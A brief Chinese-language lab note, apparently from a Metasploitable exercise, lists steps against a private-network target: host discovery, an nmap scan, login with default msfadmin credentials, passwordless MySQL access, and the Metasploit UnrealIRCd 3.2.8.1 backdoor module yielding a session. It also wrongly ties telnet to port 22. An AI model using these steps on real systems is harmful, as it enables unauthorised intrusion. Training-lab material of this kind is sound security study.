netdiscover:发现目标主机

nmap 192.168.80.148:扫靶机端口开放情况

1.弱口令漏洞:
telnet 192.168.80.148:由于22端口开放
login/passwd均为msfadmin

2.mysql弱密码登陆:
kali里面输mysql -h 192.168.80.148

3.由于nmap扫靶机端口看到6667端口开放
就来做个实验记录一下
进msfconsole,寻找unreal_ircd_3281_backdoor

使用模块:use exploit/unix/irc/unreal_ircd_3281_backdoor

通过show options设置相应的参数

要设置的参数为rhost,已设置rport(不需管)

开始攻击

成功建立会话